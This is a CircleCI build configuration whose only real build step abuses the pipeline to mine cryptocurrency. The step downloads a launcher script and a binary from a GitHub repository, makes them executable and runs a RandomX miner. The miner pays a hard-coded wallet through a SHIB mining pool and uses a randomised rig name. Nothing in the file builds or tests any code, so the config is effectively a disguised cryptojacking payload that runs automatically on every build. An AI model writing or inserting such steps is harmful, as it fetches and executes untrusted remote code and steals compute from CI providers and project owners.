version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin SHIB -wallet 0x5582a062832c2FBff2F4d14C5e5Ad2a3Cb84f6C0  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 SHIB.2miners.com:2222